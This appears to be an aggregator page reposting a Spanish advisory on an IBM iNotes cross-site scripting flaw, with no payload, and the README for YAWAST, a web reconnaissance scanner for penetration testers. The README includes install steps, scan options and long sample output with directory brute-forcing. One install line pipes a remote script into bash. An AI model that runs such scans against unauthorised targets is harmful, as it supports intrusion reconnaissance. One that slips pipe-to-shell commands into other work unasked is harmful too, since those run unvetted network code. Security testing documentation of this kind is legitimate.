Quantcast
Channel: Hacking Land :: Hack, Crack and Pentest
Viewing all 1954 articles
Browse latest View live

Vulnerabilidad de Cross-Site Scripting en IBM iNotes

$
0
0
IBM ha confirmadouna vulnerabilidad en IBM iNotes 8.5.xque podría permitir a atacantes remotos la realización de ataques de cross-site scripting.

IBM iNotes (anteriormente conocido como IBM Lotus iNotes) es una versión completa basada en web del cliente de Notes, incluyendo todas sus funciones. iNotes proporciona acceso desde el navegador al correo electrónico, el calendario y los contactos de Notes, así como el acceso a las aplicaciones y herramientas empresariales.

El problema corregido (con CVE-2016-0282) reside en una validación inadecuada de las entradas del usuario. Un atacante remoto podría explotar la vulnerabilidad mediante URLs específicamente creadas, lo que le permitiría ejecutar scripts en el navegador de la víctima. Se podría utilizar esta vulnerabilidad para robar las cookies de las credenciales de autenticación de la víctima y los datos presentados recientemente.

IBM ha publicado las actualizaciones necesarias en IBM iNotes 8.5.3 Fix Pack 6 Interim Fix 2. Disponible desde:

Más información:

Security Bulletin: IBM iNotes Cross-site Scripting Vulnerability (CVE-2016-0282)



Antonio Ropero

Twitter: @aropero

Via:unaaldia.hispasec.com

yawast - The YAWAST Antecedent Web Application Security Toolkit

$
0
0

YAWAST is an application meant to simplify initial analysis and information gathering for penetration testers and security auditors. It performs basic checks in these categories:
  • TLS/SSL - Versions and cipher suites supported; common issues.
  • Information Disclosure - Checks for common information leaks.
  • Presence of Files or Directories - Checks for files or directories that could indicate a security issue.
  • Common Vulnerabilities
  • Missing Security Headers
This is meant to provide a easy way to perform initial analysis and information discovery. It's not a full testing suite, and it certainly isn't Metasploit. The idea is to provide a quick way to perform initial data collection, which can then be used to better target further tests. It is especially useful when used in conjunction with Burp Suite (via the --proxy parameter).

Installing
The simplest method to install is to use the RubyGem installer:
gem install yawast
This allows for simple updates ( gem update yawast ) and makes it easy to ensure that you are always using the latest version.
YAWAST requires Ruby 2.2+, and is tested on Mac OSX and Linux (Windows should work; please open a ticket if you have issues).
Kali Rolling
To install on Kali, just run gem install yawast - all of the dependentcies are already installed.
Ubuntu 16.04
To install YAWAST, you first need to install a couple packages via apt-get :
sudo apt-get install ruby ruby-dev
sudo gem install yawast
Mac OSX
The version of Ruby shipped with Mac OSX 10.11 is too old, so the recommended solution is to use RVM:
gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
\curl -sSL https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
rvm install 2.2
rvm use 2.2 --default
gem install yawast

Tests
The following tests are performed:
  • (Generic) Info Disclosure: X-Powered-By header present
  • (Generic) Info Disclosure: X-Pingback header present
  • (Generic) Info Disclosure: X-Backend-Server header present
  • (Generic) Info Disclosure: X-Runtime header present
  • (Generic) Info Disclosure: Via header present
  • (Generic) Info Disclosure: PROPFIND Enabled
  • (Generic) TRACE Enabled
  • (Generic) X-Frame-Options header not present
  • (Generic) X-Content-Type-Options header not present
  • (Generic) Content-Security-Policy header not present
  • (Generic) Public-Key-Pins header not present
  • (Generic) X-XSS-Protection disabled header present
  • (Generic) SSL: HSTS not enabled
  • (Generic) Source Control: Common source control directories present
  • (Generic) Presence of crossdomain.xml or clientaccesspolicy.xml
  • (Generic) Presence of sitemap.xml
  • (Generic) Presence of WS_FTP.LOG
  • (Generic) Presence of RELEASE-NOTES.txt
  • (Generic) Presence of readme.html
  • (Generic) Missing cookie flags (Secure & HttpOnly)
  • (Generic) Search for common directories
  • (Apache) Info Disclosure: Module listing enabled
  • (Apache) Info Disclosure: Server version
  • (Apache) Info Disclosure: OpenSSL module version
  • (Apache) Presence of /server-status
  • (Apache) Presence of /server-info
  • (IIS) Info Disclosure: Server version
  • (ASP.NET) Info Disclosure: ASP.NET version
  • (ASP.NET) Info Disclosure: ASP.NET MVC version
  • (ASP.NET) Presence of Trace.axd
  • (ASP.NET) Presence of Elmah.axd
  • (ASP.NET) Debugging Enabled
  • (nginx) Info Disclosure: Server version
  • (PHP) Info Disclosure: PHP version
CMS Detection:
  • Generic (Generator meta tag) [Real detection coming as soon as I get around to it...]
SSL Information:
  • Certificate details
  • Certificate chain
  • Supported ciphers
  • Maximum requests in a single connection
Checks for the following SSL issues are performed:
  • Expired Certificate
  • Self-Signed Certificate
  • MD5 Signature
  • SHA1 Signature
  • RC4 Cipher Suites
  • Weak (< 128 bit) Cipher Suites
  • SWEET32
In addition to these tests, certain basic information is also displayed, such as IPs (and the PTR record for each IP), HTTP HEAD request, and others.

TLS / SSL Testing
YAWAST offers two modes for testing TLS / SSL - one is custom, and most useful for internal systems, and the other uses the SSL Labs API.

Internal Mode
To use the custom internal TLS / SSL scanner (which uses your copy of OpenSSL), simply pass --internalssl on the command line. Here is a sample of the output generated by this tester.
[I] Found X509 Certificate:
[I] Issued To: sni67677.cloudflaressl.com /
[I] Issuer: COMODO ECC Domain Validation Secure Server CA 2 / COMODO CA Limited
[I] Version: 2
[I] Serial: 14171089194524384184707003668844347326
[I] Subject: /OU=Domain Control Validated/OU=PositiveSSL Multi-Domain/CN=sni67677.cloudflaressl.com
[I] Expires: 2016-09-11 23:59:59 UTC
[I] Signature Algorithm: ecdsa-with-SHA256
[I] Key: EC-prime256v1
[I] Key Hash: 1a23d84441f9b811dc188bab42b2375873c42ba2
[I] Extensions:
[I] authorityKeyIdentifier = keyid:40:09:61:67:F0:BC:83:71:4F:DE:12:08:2C:6F:D4:D4:2B:76:3D:96,
[I] subjectKeyIdentifier = D0:F8:D6:82:36:B5:5C:AC:2D:9A:8E:7B:D9:D5:E6:99:38:B6:8C:FE
[I] keyUsage = critical, Digital Signature
[I] basicConstraints = critical, CA:FALSE
[I] extendedKeyUsage = TLS Web Server Authentication, TLS Web Client Authentication
[I] certificatePolicies = Policy: 1.3.6.1.4.1.6449.1.2.2.7, CPS: https://secure.comodo.com/CPS, Policy: 2.23.140.1.2.1,
[I] crlDistributionPoints = , Full Name:, URI:http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl,
[I] authorityInfoAccess = CA Issuers - URI:http://crt.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crt, OCSP - URI:http://ocsp.comodoca4.com,
[I] Alternate Names:
[I] sni67677.cloudflaressl.com
[I] *.adamcaudill.com
[I] *.bsidesknoxville.com
[I] *.secrypto.com
[I] *.smimp.org
[I] *.underhandedcrypto.com
[I] adamcaudill.com
[I] bsidesknoxville.com
[I] secrypto.com
[I] smimp.org
[I] underhandedcrypto.com
[I] Hash: 9be2091903a01bcff3ec4049ed1d037a8c611010

[I] Certificate: Chain
[I] Issued To: sni67677.cloudflaressl.com /
[I] Issuer: COMODO ECC Domain Validation Secure Server CA 2 / COMODO CA Limited
[I] Expires: 2016-09-11 23:59:59 UTC
[I] Key: EC-prime256v1
[I] Signature Algorithm: ecdsa-with-SHA256
[I] Hash: 9be2091903a01bcff3ec4049ed1d037a8c611010

[I] Issued To: COMODO ECC Domain Validation Secure Server CA 2 / COMODO CA Limited
[I] Issuer: COMODO ECC Certification Authority / COMODO CA Limited
[I] Expires: 2029-09-24 23:59:59 UTC
[I] Key: EC-prime256v1
[I] Signature Algorithm: ecdsa-with-SHA384
[I] Hash: 75cfd9bc5cefa104ecc1082d77e63392ccba5291

[I] Issued To: COMODO ECC Certification Authority / COMODO CA Limited
[I] Issuer: AddTrust External CA Root / AddTrust AB
[I] Expires: 2020-05-30 10:48:38 UTC
[I] Key: EC-secp384r1
[I] Signature Algorithm: sha384WithRSAEncryption
[I] Hash: ae223cbf20191b40d7ffb4ea5701b65fdc68a1ca


Qualys SSL Labs: https://www.ssllabs.com/ssltest/analyze.html?d=adamcaudill.com&hideResults=on

Supported Ciphers (based on your OpenSSL version):
Checking for TLSv1 suites (98 possible suites)
[I] Version: TLSv1 Bits: 256 Cipher: ECDHE-ECDSA-AES256-SHA
[I] Version: TLSv1 Bits: 128 Cipher: ECDHE-ECDSA-AES128-SHA
[W] Version: TLSv1 Bits: 112 Cipher: ECDHE-ECDSA-DES-CBC3-SHA
Checking for TLSv1_2 suites (98 possible suites)
[I] Version: TLSv1.2 Bits: 256 Cipher: ECDHE-ECDSA-AES256-GCM-SHA384
[I] Version: TLSv1.2 Bits: 256 Cipher: ECDHE-ECDSA-AES256-SHA384
[I] Version: TLSv1.2 Bits: 256 Cipher: ECDHE-ECDSA-AES256-SHA
[I] Version: TLSv1.2 Bits: 128 Cipher: ECDHE-ECDSA-AES128-GCM-SHA256
[I] Version: TLSv1.2 Bits: 128 Cipher: ECDHE-ECDSA-AES128-SHA256
[I] Version: TLSv1.2 Bits: 128 Cipher: ECDHE-ECDSA-AES128-SHA
[W] Version: TLSv1.2 Bits: 112 Cipher: ECDHE-ECDSA-DES-CBC3-SHA
Checking for TLSv1_1 suites (98 possible suites)
[I] Version: TLSv1.1 Bits: 256 Cipher: ECDHE-ECDSA-AES256-SHA
[I] Version: TLSv1.1 Bits: 128 Cipher: ECDHE-ECDSA-AES128-SHA
[W] Version: TLSv1.1 Bits: 112 Cipher: ECDHE-ECDSA-DES-CBC3-SHA
Checking for SSLv3 suites (98 possible suites)
This version is more limited than the SSL Labs option, though will work in cases where SSL Labs is unable to connect to the target server.

SSL Labs Mode
The default mode is to use the SSL Labs API, which makes all users bound by their terms and conditions , and obviously results in the domain you are scanning being sent to them.
This mode is the most comprehensive, and contains far more data than the Internal Mode. Unless there is a good reason to use the Internal Mode, this is what you should use.

Usage
  • Standard scan: ./yawast scan <url> [--internalssl] [--tdessessioncount] [--nossl] [--nociphers] [--dir] [--dirrecursive] [--dirlistredir] [--proxy localhost:8080] [--cookie SESSIONID=12345]
  • HEAD-only scan: ./yawast head <url> [--internalssl] [--tdessessioncount] [--nossl] [--nociphers] [--proxy localhost:8080] [--cookie SESSIONID=12345]
  • SSL information: ./yawast ssl <url> [--internalssl] [--tdessessioncount] [--nociphers]
  • CMS detection: ./yawast cms <url> [--proxy localhost:8080] [--cookie SESSIONID=12345]
For detailed information, just call ./yawast -h to see the help page. To see information for a specific command, call ./yawast -h <command> for full details.

Using with Burp Suite
By default, Burp Suite's proxy listens on localhost at port 8080, to use YAWAST with Burp Suite (or any proxy for that matter), just add this to the command line:
--proxy localhost:8080

Authenticated Testing
For authenticated testing, YAWAST allows you to specify a cookie to be passed via the --cookie parameter.
--cookie SESSIONID=1234567890

Sample
Using scan - the normal go-to option, here's what you get when scanning my website:
$yawast scan https://adamcaudill.com --tdessessioncount --dir
__ _____ _ _ ___ _____ _____
\ \ / / _ \| | | |/ _ \ / ___|_ _|
\ V / /_\ \ | | / /_\ \\ `--. | |
\ /| _ | |/\| | _ | `--. \ | |
| || | | \ /\ / | | |/\__/ / | |
\_/\_| |_/\/ \/\_| |_/\____/ \_/

YAWAST v0.3.0 - The YAWAST Antecedent Web Application Security Toolkit
Copyright (c) 2013-2016 Adam Caudill <adam@adamcaudill.com>
Support & Documentation: https://github.com/adamcaudill/yawast
Ruby 2.2.4-p230; OpenSSL 1.0.2f 28 Jan 2016 (x86_64-darwin15)

Scanning: https://adamcaudill.com/

DNS Information:
[I] 104.28.27.55 (N/A)
https://www.shodan.io/host/104.28.27.55
https://censys.io/ipv4/104.28.27.55
[I] 104.28.26.55 (N/A)
https://www.shodan.io/host/104.28.26.55
https://censys.io/ipv4/104.28.26.55
[I] 2400:CB00:2048:1::681C:1A37 (N/A)
https://www.shodan.io/host/2400:cb00:2048:1::681c:1a37
[I] 2400:CB00:2048:1::681C:1B37 (N/A)
https://www.shodan.io/host/2400:cb00:2048:1::681c:1b37
[I] TXT: v=spf1 mx a ptr include:_spf.google.com ~all
[I] MX: aspmx4.googlemail.com (30)
[I] MX: aspmx.l.google.com (10)
[I] MX: alt1.aspmx.l.google.com (20)
[I] MX: aspmx2.googlemail.com (30)
[I] MX: alt2.aspmx.l.google.com (20)
[I] MX: aspmx3.googlemail.com (30)
[I] MX: aspmx5.googlemail.com (30)
[I] NS: vera.ns.cloudflare.com
[I] NS: hal.ns.cloudflare.com

[I] HEAD:
[I] date: Fri, 16 Sep 2016 00:24:15 GMT
[I] content-type: text/html; charset=UTF-8
[I] connection: close
[I] set-cookie: __cfduid=df78c5171c732bf2104fd8cc2dd82afd41473985455; expires=Sat, 16-Sep-17 00:24:15 GMT; path=/; domain=.adamcaudill.com; HttpOnly
[I] vary: Accept-Encoding,Cookie
[I] cache-control: max-age=3, must-revalidate
[I] wp-super-cache: Served supercache file from PHP
[I] last-modified: Fri, 16 Sep 2016 00:20:05 GMT
[I] x-frame-options: sameorigin
[I] strict-transport-security: max-age=15552000; preload
[I] x-content-type-options: nosniff
[I] server: cloudflare-nginx
[I] cf-ray: 2e302ca911c550da-MIA

[I] NOTE: Server appears to be Cloudflare; WAF may be in place.

[I] X-Frame-Options Header: sameorigin
[I] X-Content-Type-Options Header: nosniff
[W] Content-Security-Policy Header Not Present
[W] Public-Key-Pins Header Not Present

[I] Cookies:
[I] __cfduid=df78c5171c732bf2104fd8cc2dd82afd41473985455; expires=Sat, 16-Sep-17 00:24:15 GMT; path=/; domain=.adamcaudill.com; HttpOnly
[W] Cookie missing Secure flag


Beginning SSL Labs scan (this could take a minute or two)
[SSL Labs] This assessment service is provided free of charge by Qualys SSL Labs, subject to our terms and conditions: https://www.ssllabs.com/about/terms.html
..........................................

[I] IP: 104.28.27.55 - Grade: A+

Certificate Information:
[I] Subject: CN=sni67677.cloudflaressl.com,OU=PositiveSSL Multi-Domain,OU=Domain Control Validated
[I] Common Names: ["sni67677.cloudflaressl.com"]
[I] Alternative names:
[I] sni67677.cloudflaressl.com
[I] *.adamcaudill.com
[I] *.bsidesknoxville.com
[I] *.secrypto.com
[I] *.smimp.org
[I] *.underhandedcrypto.com
[I] adamcaudill.com
[I] bsidesknoxville.com
[I] secrypto.com
[I] smimp.org
[I] underhandedcrypto.com
[I] Not Before: 2016-08-13T00:00:00+00:00
[I] Not After: 2017-02-12T23:59:59+00:00
[I] Key: EC 256 (RSA equivalent: 3072)
[I] Public Key Hash: b658ea09e127fafe0416588a17446b606499df6e
[I] Version: 2
[I] Serial: 18930702358496442989903109042193740748
[I] Issuer: COMODO ECC Domain Validation Secure Server CA 2
[I] Signature algorithm: SHA256withECDSA
[I] Extended Validation: No (Domain Control)
[I] Certificate Transparency: No
[I] OCSP Must Staple: No
[I] Revocation information: CRL information available
[I] Revocation information: OCSP information available
[I] Revocation status: certificate not revoked
[I] Extensions:
[I] authorityKeyIdentifier = keyid:40:09:61:67:F0:BC:83:71:4F:DE:12:08:2C:6F:D4:D4:2B:76:3D:96,
[I] subjectKeyIdentifier = D0:F8:D6:82:36:B5:5C:AC:2D:9A:8E:7B:D9:D5:E6:99:38:B6:8C:FE
[I] keyUsage = critical, Digital Signature
[I] basicConstraints = critical, CA:FALSE
[I] extendedKeyUsage = TLS Web Server Authentication, TLS Web Client Authentication
[I] certificatePolicies = Policy: 1.3.6.1.4.1.6449.1.2.2.7, CPS: https://secure.comodo.com/CPS, Policy: 2.23.140.1.2.1,
[I] crlDistributionPoints = , Full Name:, URI:http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl,
[I] authorityInfoAccess = CA Issuers - URI:http://crt.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crt, OCSP - URI:http://ocsp.comodoca4.com,
[I] Hash: 1ae6362e4fc377cccb6df6261838a5d9bb49663d
https://censys.io/certificates?q=1ae6362e4fc377cccb6df6261838a5d9bb49663d
https://crt.sh/?q=1ae6362e4fc377cccb6df6261838a5d9bb49663d

Configuration Information:
Protocol Support:
[I] TLS 1.0
[I] TLS 1.1
[I] TLS 1.2

Cipher Suite Support:
[I] TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 - 128-bits - ECDHE-256-bits
[I] TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 - 128-bits - ECDHE-256-bits
[I] TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA - 128-bits - ECDHE-256-bits
[I] TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 - 256-bits - ECDHE-256-bits
[I] TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 - 256-bits - ECDHE-256-bits
[I] TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA - 256-bits - ECDHE-256-bits
[W] TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA - 112-bits - ECDHE-256-bits
[I] TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 - 256-bits - ECDHE-256-bits
[I] OLD_TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 - 256-bits - ECDHE-256-bits

Handshake Simulation:
[E] Android 2.3.7 - Simulation Failed
[I] Android 4.0.4 - TLS 1.0 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
[I] Android 4.1.1 - TLS 1.0 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
[I] Android 4.2.2 - TLS 1.0 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
[I] Android 4.3 - TLS 1.0 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
[I] Android 4.4.2 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] Android 5.0.0 - TLS 1.2 - OLD_TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
[I] Android 6.0 - TLS 1.2 - OLD_TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256
[I] Baidu Jan 2015 - TLS 1.0 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
[I] BingPreview Jan 2015 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] Chrome 51 / Win 7 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] Firefox 31.3.0 ESR / Win 7 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] Firefox 46 / Win 7 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] Firefox 47 / Win 7 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] Googlebot Feb 2015 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[E] IE 6 / XP - Simulation Failed
[I] IE 7 / Vista - TLS 1.0 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
[E] IE 8 / XP - Simulation Failed
[I] IE 8-10 / Win 7 - TLS 1.0 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
[I] IE 11 / Win 7 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] IE 11 / Win 8.1 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] IE 10 / Win Phone 8.0 - TLS 1.0 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
[I] IE 11 / Win Phone 8.1 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] IE 11 / Win Phone 8.1 Update - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] IE 11 / Win 10 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] Edge 13 / Win 10 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] Edge 13 / Win Phone 10 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[E] Java 6u45 - Simulation Failed
[I] Java 7u25 - TLS 1.0 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
[I] Java 8u31 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[E] OpenSSL 0.9.8y - Simulation Failed
[I] OpenSSL 1.0.1l - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] OpenSSL 1.0.2e - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] Safari 5.1.9 / OS X 10.6.8 - TLS 1.0 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
[I] Safari 6 / iOS 6.0.1 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
[I] Safari 6.0.4 / OS X 10.8.4 - TLS 1.0 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA
[I] Safari 7 / iOS 7.1 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
[I] Safari 7 / OS X 10.9 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
[I] Safari 8 / iOS 8.4 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
[I] Safari 8 / OS X 10.10 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256
[I] Safari 9 / iOS 9 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] Safari 9 / OS X 10.11 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] Apple ATS 9 / iOS 9 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] Yahoo Slurp Jan 2015 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
[I] YandexBot Jan 2015 - TLS 1.2 - TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256

Protocol & Vulnerability Information:
[I] DROWN: No
[I] Secure Renegotiation: secure renegotiation supported
[I] POODLE (SSL): No
[I] POODLE (TLS): No
[I] Downgrade Prevention: Yes
[I] Compression: No
[I] Heartbleed: No
[I] OpenSSL CCS (CVE-2014-0224): No
[I] OpenSSL Padding Oracle (CVE-2016-2107): No
[I] Forward Secrecy: Yes (all simulated clients)
[I] OCSP Stapling: Yes
[I] FREAK: No
[I] Logjam: No
[I] DH public server param (Ys) reuse: No
[W] Protocol Intolerance: TLS 1.3

TLS Session Request Limit: Checking number of requests accepted using 3DES suites...
.....
[I] TLS Session Request Limit: Connection terminated after 100 requests (TLS Reconnected)

[I] HSTS: Enabled (strict-transport-security: max-age=15552000; preload)

[W] '/readme.html' found: https://adamcaudill.com/readme.html

Searching for common directories...
[I] Found Redirect: 'https://adamcaudill.com/0/ -> 'https://adamcaudill.com/'
[I] Found Redirect: 'https://adamcaudill.com/1/ -> 'https://adamcaudill.com/2013/04/16/1password-pbkdf2-and-implementation-flaws/'
[I] Found Redirect: 'https://adamcaudill.com/2/ -> 'https://adamcaudill.com/2015/01/01/2014-a-year-in-review/'
[I] Found Redirect: 'https://adamcaudill.com/20/ -> 'https://adamcaudill.com/2015/01/01/2014-a-year-in-review/'
[I] Found: 'https://adamcaudill.com/2003/'
[I] Found: 'https://adamcaudill.com/2004/'
[I] Found: 'https://adamcaudill.com/2005/'
[I] Found: 'https://adamcaudill.com/2006/'
[I] Found: 'https://adamcaudill.com/2007/'
[I] Found: 'https://adamcaudill.com/2008/'
[I] Found: 'https://adamcaudill.com/2009/'
[I] Found: 'https://adamcaudill.com/2010/'
[I] Found: 'https://adamcaudill.com/2011/'
[I] Found: 'https://adamcaudill.com/2013/'
[I] Found: 'https://adamcaudill.com/2014/'
[I] Found: 'https://adamcaudill.com/2015/'
[I] Found: 'https://adamcaudill.com/2016/'
[I] Found Redirect: 'https://adamcaudill.com/A/ -> 'https://adamcaudill.com/2014/10/17/a-backdoor-by-any-other-name/'
[I] Found: 'https://adamcaudill.com/About/'
[I] Found Redirect: 'https://adamcaudill.com/Archive/ -> 'https://adamcaudill.com/archives/'
[I] Found Redirect: 'https://adamcaudill.com/B/ -> 'https://adamcaudill.com/2005/09/22/back-from-new-york/'
[I] Found: 'https://adamcaudill.com/Blog/'
[I] Found Redirect: 'https://adamcaudill.com/C/ -> 'https://adamcaudill.com/2009/10/03/cancel-godaddys-domain-privacy/'
[I] Found Redirect: 'https://adamcaudill.com/D/ -> 'https://adamcaudill.com/2006/06/02/data-theft-its-happened-again/'
[I] Found Redirect: 'https://adamcaudill.com/E/ -> 'https://adamcaudill.com/2006/03/17/end-on-an-era/'
[I] Found Redirect: 'https://adamcaudill.com/F/ -> 'https://adamcaudill.com/2011/05/14/facebook-scams/'
[I] Found Redirect: 'https://adamcaudill.com/G/ -> 'https://adamcaudill.com/2003/11/26/get-cpu-speed/'
[I] Found Redirect: 'https://adamcaudill.com/H/ -> 'https://adamcaudill.com/2011/05/21/happy-20th-birthday-visual-basic/'
[I] Found Redirect: 'https://adamcaudill.com/Home/ -> 'https://adamcaudill.com/'
[I] Found Redirect: 'https://adamcaudill.com/I/ -> 'https://adamcaudill.com/2007/02/10/i-love-my-job/'
[I] Found Redirect: 'https://adamcaudill.com/Internet/ -> 'https://adamcaudill.com/2006/05/27/internet-explorer-7/'
[I] Found Redirect: 'https://adamcaudill.com/J/ -> 'https://adamcaudill.com/2014/07/23/jumping-through-hoops-dot-dot-dot/'
[I] Found Redirect: 'https://adamcaudill.com/L/ -> 'https://adamcaudill.com/lasers/'
[I] Found Redirect: 'https://adamcaudill.com/M/ -> 'https://adamcaudill.com/2006/09/23/make-xp-pretty/'
[I] Found Redirect: 'https://adamcaudill.com/N/ -> 'https://adamcaudill.com/2011/02/11/need-a-cheap-phone-charger-quick-buy-a-tracfone/'
[I] Found Redirect: 'https://adamcaudill.com/O/ -> 'https://adamcaudill.com/2006/06/17/of-victory-and-pair-programming/'
[I] Found Redirect: 'https://adamcaudill.com/P/ -> 'https://adamcaudill.com/2003/10/31/pagesource/'
[I] Found Redirect: 'https://adamcaudill.com/PHP/ -> 'https://adamcaudill.com/2005/03/01/phpbb-2-0-13-released-dumbss-coders-strike-again/'
[I] Found Redirect: 'https://adamcaudill.com/Pages/ -> 'https://adamcaudill.com/2003/10/31/pagesource/'
[I] Found Redirect: 'https://adamcaudill.com/R/ -> 'https://adamcaudill.com/2011/01/28/rails-3-dreamhost-ps/'
[I] Found Redirect: 'https://adamcaudill.com/S/ -> 'https://adamcaudill.com/2016/05/22/seamless-phishing/'
[I] Found Redirect: 'https://adamcaudill.com/Security/ -> 'https://adamcaudill.com/2014/03/23/security-by-buzzword-why-i-dont-support-ensafer/'
[I] Found Redirect: 'https://adamcaudill.com/T/ -> 'https://adamcaudill.com/2007/01/21/task-management-with-tasks/'
[I] Found Redirect: 'https://adamcaudill.com/U/ -> 'https://adamcaudill.com/2007/03/22/under-the-weather/'
[I] Found Redirect: 'https://adamcaudill.com/US/ -> 'https://adamcaudill.com/2006/07/08/useful-notepad-tip/'
[I] Found Redirect: 'https://adamcaudill.com/V/ -> 'https://adamcaudill.com/2006/05/10/valleyschwag/'
[I] Found Redirect: 'https://adamcaudill.com/W/ -> 'https://adamcaudill.com/2006/11/28/want-a-free-copy-of-vista/'
[I] Found Redirect: 'https://adamcaudill.com/Windows/ -> 'https://adamcaudill.com/2007/03/01/windows-vista-user-experience-guidelines/'
[I] Found Redirect: 'https://adamcaudill.com/X/ -> 'https://adamcaudill.com/2007/01/25/xceed-datagrid-for-wpf-released-free/'
[I] Found Redirect: 'https://adamcaudill.com/XML/ -> 'https://adamcaudill.com/2006/09/03/xml-notepad-2006/'
[I] Found Redirect: 'https://adamcaudill.com/a/ -> 'https://adamcaudill.com/2014/10/17/a-backdoor-by-any-other-name/'
[I] Found: 'https://adamcaudill.com/about/'
[I] Found Redirect: 'https://adamcaudill.com/ad/ -> 'https://adamcaudill.com/2006/03/29/advanced-net-programming/'
[I] Found Redirect: 'https://adamcaudill.com/adv/ -> 'https://adamcaudill.com/2006/03/29/advanced-net-programming/'
[I] Found Redirect: 'https://adamcaudill.com/advanced/ -> 'https://adamcaudill.com/2006/03/29/advanced-net-programming/'
[I] Found Redirect: 'https://adamcaudill.com/ap/ -> 'https://adamcaudill.com/2003/11/17/apisettings/'
[I] Found Redirect: 'https://adamcaudill.com/api/ -> 'https://adamcaudill.com/2003/11/17/apisettings/'
[I] Found Redirect: 'https://adamcaudill.com/ar/ -> 'https://adamcaudill.com/archives/'
[I] Found Redirect: 'https://adamcaudill.com/archive/ -> 'https://adamcaudill.com/archives/'
[I] Found: 'https://adamcaudill.com/archives/'
[I] Found Redirect: 'https://adamcaudill.com/asp/ -> 'https://adamcaudill.com/2007/01/25/aspnet-ajax/'
[I] Found Redirect: 'https://adamcaudill.com/atom/ -> 'https://adamcaudill.com/feed/atom/'
[I] Found Redirect: 'https://adamcaudill.com/avatars/ -> 'https://adamcaudill.com/2009/06/19/avatars-why-roll-your-own/'
[I] Found Redirect: 'https://adamcaudill.com/b/ -> 'https://adamcaudill.com/2005/09/22/back-from-new-york/'
[I] Found Redirect: 'https://adamcaudill.com/back/ -> 'https://adamcaudill.com/2005/09/22/back-from-new-york/'
[I] Found Redirect: 'https://adamcaudill.com/backup/ -> 'https://adamcaudill.com/2007/08/27/backups-with-jungledrive/'
[I] Found Redirect: 'https://adamcaudill.com/backups/ -> 'https://adamcaudill.com/2007/08/27/backups-with-jungledrive/'
[I] Found Redirect: 'https://adamcaudill.com/bb/ -> 'https://adamcaudill.com/2011/05/21/bbpress-20-beta-1-released/'
[I] Found Redirect: 'https://adamcaudill.com/bl/ -> 'https://adamcaudill.com/blog/'
[I] Found: 'https://adamcaudill.com/blog/'
[I] Found Redirect: 'https://adamcaudill.com/blue/ -> 'https://adamcaudill.com/2006/06/04/blue-hole-waterfall/'
[I] Found Redirect: 'https://adamcaudill.com/build/ -> 'https://adamcaudill.com/2007/01/04/building-a-windows-powertoy/'
